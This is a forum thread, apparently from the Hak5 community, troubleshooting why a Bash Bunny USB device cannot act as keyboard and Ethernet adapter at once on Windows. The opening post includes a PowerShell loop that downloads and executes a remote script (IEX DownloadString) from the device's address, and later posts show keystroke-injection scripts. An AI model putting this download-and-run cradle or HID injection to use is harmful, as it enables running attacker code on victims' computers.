Composite device not working correctly (Windows)

[Seczilla]

When using the following at the same time the BB is not recognized as an Ethernet adapter.

ATTACKMODE RNDIS_ETHERNET HID

I thought that this would be a feature of the BB to combine attack modes at the same time. I know I can do them after each other but that makes it just more complicated in some cases.

I have seen in some examples that they use HID to create a loop in Powershell to check for the connection with Test-Connection and after that switch the attack mode to RNDIS_ETHERNET.

That just creates the following problem for me.

C:\WINDOWS\system32>powershell "while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/test.ps1');exit}}"

Test-Connection : Testing connection to computer '172.16.64.1' failed: Error due to lack of resources
At line:1 char:20
+ while ($true) {If (Test-Connection 172.16.64.1 -count 1) { ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (172.16.64.1:String) [Test-Connection], PingException
    + FullyQualifiedErrorId : TestConnectionException,Microsoft.PowerShell.Commands.TestConnectionCommand

Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:77
+ ... IEX (New-Object Net.WebClient).DownloadString('http://172 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Is there any update planned to fix the behavior in Windows that we can actually use the attack modes at the same time?

While I don't like the workaround mentioned above it would work if I would not get the message "Unable to connect to the remote server". If I execute it manually a few seconds later it works just fine. Any ideas? Thank you in advance.

[Seczilla]

Sorry, I accidentally created this post under payloads. Can it be moved to the correct forum? I don't see a way for me to do it.

[Decoy]

This Wiki has some good information about valid Attack Mode combinations:

http://wiki.bashbunny.com/#!./index.md#Bunny_Script

You don't have to put all your attack modes in one line at the same time either. If you want to start as a keyboard, just start with the HID attack mode. Switch to Ethernet when necessary, and then switch to Storage if you want. All that said, I think your combination might be backwards. Try doing this instead, to match valid combo structure and let us know if it resolves your issue:

ATTACKMODE HID RNDIS_ETHERNET

 

[Seczilla]

Thanks @Decoy. The Wiki was the first read I had.

I know I don't have to do them all at the same time but I don't like switching between HID and Ethernet for example. The reason is that it creates delays every time I switch.

Take this example:

LED R B
#ATTACKMODE HID RNDIS_ETHERNET

ATTACKMODE RNDIS_ETHERNET
ATTACKMODE HID 
LED G

Q GUI
Q DELAY 500
Q STRING cmd.exe
Q DELAY 100
Q ENTER
Q DELAY 500
Q STRING ping -t 172.16.64.1
Q ENTER

At first it creates the Ethernet interface just fine. Then it switches to HID and the Ethernet goes away (as expected). ATTACKMODE HID RNDIS_ETHERNET does not work either. It will fail to create the Ethernet interface and after that starts typing. 

At https://forums.hak5.org/index.php?/topic/40246-windows-10-support/ it looks like I am not the only one having this issue. @Darren Kitchen said: 

Quote

 

The default switch2 payload recognizes as storage but not Ethernet on Windows. Same thing with Mac. Go figure - it works on my development Linux box. The issue has to do with composite devices and Windows ability to recognize RNDIS as one.

When combining attack modes the Bash Bunny registers as a composite device. Windows doesn't recognize RNDIS_ETHERNET as a composite device by default. Drivers could be installed, but that defeats the purpose in many instances. Alone ATTACKMODE RNDIS_ETHERNET works without drivers on Windows hosts. Thankfully the ATTACKMODE command can be run subsequently to change the state to other modes later on in payloads conditionally.

 

So the only way I found it was working on Windows is using HID first to create a loop and wait for the Ethernet connection to come to life. Not a sexy solution - more like a workaround. Technically it should be possible to have the BB register as HID AND Ethernet at the same time.

[Dave-ee Jones]

13 minutes ago, Seczilla said:

Thanks @Decoy. The Wiki was the first read I had.

I know I don't have to do them all at the same time but I don't like switching between HID and Ethernet for example. The reason is that it creates delays every time I switch.

Take this example:

LED R B
#ATTACKMODE HID RNDIS_ETHERNET

ATTACKMODE RNDIS_ETHERNET
ATTACKMODE HID 
LED G

Q GUI
Q DELAY 500
Q STRING cmd.exe
Q DELAY 100
Q ENTER
Q DELAY 500
Q STRING ping -t 172.16.64.1
Q ENTER

At first it creates the Ethernet interface just fine. Then it switches to HID and the Ethernet goes away (as expected). ATTACKMODE HID RNDIS_ETHERNET does not work either. It will fail to create the Ethernet interface and after that starts typing. 

At https://forums.hak5.org/index.php?/topic/40246-windows-10-support/ it looks like I am not the only one having this issue. @Darren Kitchen said: 

So the only way I found it was working on Windows is using HID first to create a loop and wait for the Ethernet connection to come to life. Not a sexy solution - more like a workaround. Technically it should be possible to have the BB register as HID AND Ethernet at the same time.

Why are you instantly changing attackmode? You can change it halfway through your code.

Doing this

ATTACKMODE RNDIS_ETHERNET
ATTACKMODE HID

does not make it do both at the same time...It only swaps our the mode. E.g. will end up in HID mode.

Decoy meant something like this:

ATTACKMODE HID
Q GUI r
Q DELAY 200
Q STRING cmd
Q ENTER
Q DELAY 500
Q STRING echo You numpty
Q ENTER
ATTACKMODE RNDIS_ETHERNET
python -m SimpleHTTPServer 8080

This starts up a CMD prompt, says something in it and then starts up a python server afterwards.

[Decoy]

3 hours ago, Dave-ee Jones said:

Why are you instantly changing attackmode? You can change it halfway through your code.

Doing this

ATTACKMODE RNDIS_ETHERNET
ATTACKMODE HID

does not make it do both at the same time...It only swaps our the mode. E.g. will end up in HID mode.

Decoy meant something like this:

ATTACKMODE HID
Q GUI r
Q DELAY 200
Q STRING cmd
Q ENTER
Q DELAY 500
Q STRING echo You numpty
Q ENTER
ATTACKMODE RNDIS_ETHERNET
python -m SimpleHTTPServer 8080

This starts up a CMD prompt, says something in it and then starts up a python server afterwards.

Yes, I apologise if that wasn't clear. 

[JBNZ]

It does seem like you could be running into the issues described in the thread you linked. When I test your example payload on Win 10, with RNDIS_ETHERNET and HID, Windows reports "driver unavailable" and no new ethernet interface is presented.

It seems like this is a limitation of the platform at present. RNDIS and HID are a valid combination, from the perspective of the bunny, but it looks like Win10 isn't playing ball.

[Seczilla]

7 hours ago, Decoy said:

Yes, I apologise if that wasn't clear. 

Yes sorry, I know that it does not make sense. It was just to show that changing it will remove the Ethernet device again and I can not use the Ethernet connection in HID mode then (unless I have a loop that waits for the Ethernet connection to be available).

I was not sure if this is an issue with just Windows 10 or if every version of Windows is affected. I think there are devices that work with RNDIS and HID at the same time in Windows 10, so it must be possible somehow. The question for me was just, how it can be done. I have a working code now but I thought this is not the best way to do it as it creates delays and officially the bunny should be able to do that. Maybe someone else had it figured out but it doesn't look like.

Thanks all for your comments.